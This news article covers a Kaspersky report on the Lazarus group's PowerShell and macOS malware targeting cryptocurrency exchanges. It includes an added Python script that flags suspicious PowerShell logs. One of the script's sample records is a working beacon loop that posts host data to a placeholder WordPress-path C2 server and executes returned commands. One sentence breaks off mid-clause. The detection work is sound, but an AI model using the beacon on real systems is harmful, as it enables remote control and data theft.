The Lazarus APT group (alias Hidden Cobra) is once again targeting financial entities, this time cryptocurrency exchanges, as it did in 2017-2018 with the Coincheck hack. A detailed report was published by Kaspersky Lab, the cybersecurity and anti-virus company, on March 26.
Lazarus is a cybercrime group comprised of an unknown number of individuals. Few hard facts are available about the group, but researchers have attributed many cyber-attacks to it over the last decade.
Lazarus, allegedly backed by North Korea, was found by Kaspersky, while tracking the group's activity, to have been running new operations since November 2018 and looking for ways to harm cryptocurrency investors.
Deployment Of PowerShell In Hacking
PowerShell is Microsoft's task automation framework: a task-based command-line shell and scripting language built on .NET, which experienced administrators and developers use to automate tasks on Windows, macOS and Linux. This time the attackers are aiming at something bigger than administration. The group uses it to collect basic host information, and, in the words of the report, "developed custom PowerShell scripts to execute commands from the operator and frame their target that interacts with C2 malicious servers."
The Kaspersky report further states that the group hides its C2 server scripts behind well-known open source projects and WordPress (a blog engine) files. Once the trojan has established a control session with the C2 server, it can begin downloading and uploading files.
The report lists the following functions: set sleep time (the delay between C2 interactions); exit the malware; collect basic host information; check malware status; show the current malware configuration; update the malware configuration; execute a system shell command; and, last but not least, download and upload files.
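The functions listed above are also what a defender can look for in PowerShell script-block logging (Event ID 4104): host reconnaissance, a beaconing loop with a configurable sleep, execution of operator-supplied commands, file transfer, and a C2 URL that hides under a blog-engine path. The script below is an added example, not code from Kaspersky's report or from the Lazarus tooling; the three script blocks it triages are constructed for illustration and the regular expressions are assumptions about what such behaviour looks like in a log, not signatures from the report.

```python
"""Heuristic triage of logged PowerShell script blocks for the backdoor
behaviours described above. Added example; the regexes and sample records
are assumptions constructed for illustration, not report signatures."""
import re

# One regex per behaviour the article attributes to the backdoor (assumed
# patterns). A script block that hits several of them at once is far more
# interesting than one that hits a single pattern, e.g. a plain admin download.
INDICATORS = {
    "host_recon": r"Get-WmiObject\s+Win32_(OperatingSystem|ComputerSystem)|\$env:COMPUTERNAME|Get-ComputerInfo",
    "c2_beacon": r"Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient",
    "sleep_loop": r"while\s*\(\s*\$true\s*\)[\s\S]*Start-Sleep",      # poll loop with a configurable delay
    "remote_exec": r"\b(iex|Invoke-Expression)\b",                     # runs whatever the operator sends back
    "file_transfer": r"DownloadFile|UploadFile|-OutFile|Invoke-RestMethod[^\n]*-Method\s+Post",
    "blog_c2_path": r"https?://[^\s'\"]+/wp-(content|includes|admin)/[^\s'\"]+\.php",  # C2 script hidden in a WordPress tree
}


def match_indicators(script_text):
    """Return the sorted list of indicator categories present in one script block."""
    return sorted(cat for cat, pat in INDICATORS.items()
                  if re.search(pat, script_text, re.IGNORECASE))


def verdict(categories, threshold=3):
    """Flag a block only when several behaviours co-occur; a lone download or
    a lone WMI query is normal administration and stays 'benign'."""
    return "suspicious" if len(categories) >= threshold else "benign"


def triage(records, threshold=3):
    """Triage a list of {'id': ..., 'script': ...} records (e.g. 4104 ScriptBlockText)."""
    results = []
    for rec in records:
        cats = match_indicators(rec["script"])
        results.append({"id": rec["id"], "categories": cats, "verdict": verdict(cats, threshold)})
    return results


# Constructed sample script blocks (assumed, not captured from a real incident).
SAMPLE_RECORDS = [
    {"id": 1, "script": "Get-WmiObject Win32_OperatingSystem | Select-Object Caption, Version"},
    {"id": 2, "script": r"Invoke-WebRequest -Uri https://updates.example.com/agent.msi -OutFile C:\Temp\agent.msi"},
    {"id": 3, "script": """
$h = @{ name = $env:COMPUTERNAME; os = (Get-WmiObject Win32_OperatingSystem).Caption }
$c2 = 'http://blog.example.net/wp-content/themes/default/news.php'
while ($true) {
  $r = Invoke-RestMethod -Uri $c2 -Method Post -Body $h
  if ($r.cmd) { iex $r.cmd }
  Start-Sleep -Seconds $r.sleep
}
"""},
]

if __name__ == "__main__":
    for r in triage(SAMPLE_RECORDS):
        print(r["id"], r["verdict"], ", ".join(r["categories"]))
```

Record 3 hits all six categories and is flagged; record 2 (a download with `-OutFile`) hits two and is not, which is the point of scoring co-occurrence rather than alerting on any single cmdlet. In production the records would come from `Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104}`, and the threshold and patterns would be tuned against the environment's own admin scripts.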
Because Apple products are increasingly popular with fintech firms and successful internet businesses, the attackers have also built macOS malware, exploiting users' trust in the brand and their habits around it.
During 2017-2018, Lazarus was reportedly responsible for stealing almost 65 percent, roughly $571 million, of the $882 million in cryptocurrency taken from online exchanges.
It is also worth noting that of the 14 individual exchange breaches in that period, five are attributed to the group. The most notorious is the theft from Japan's Coincheck, the largest in the industry's history, in which roughly $532 million worth of NEM was reportedly lost.
It is still unclear who is really behind the group, but corroborated media reports have indicated a strong connection between the group and North Korea. Besides the current investigation, in 2017 Kaspersky Lab described the group's established pattern of espionage and infiltration attacks, and found that a sub-group within the organisation, which Kaspersky called Bluenoroff, specialised in financial attacks.
The cybersecurity and anti-virus company traced multiple attacks internationally and found a direct link (an IP address) between Bluenoroff and North Korea.
Reportedly, from 2015 to 2018 North Korea accumulated over $670 million in fiat and cryptocurrency through hacking, and allegedly infected financial institutions worldwide using blockchain technology, including various interfaces, in disguise, and
Based on its observations, Kaspersky advises investors, traders, crypto-focused businesses and the wider fintech and cryptocurrency community to stay alert, avoid negligence and exercise prudence to avert heavy losses.
The report also notes that people can use popular free virus-scanning services such as VirusTotal to exercise extra caution.
The report says: "Those who are part of the booming cryptocurrency industry or technological startups, extra caution is required when dealing with new third parties or installing software on the systems. Under any circumstances never 'Enable Content' (macro scripting) in Microsoft Office documents received from new or untrusted sources..."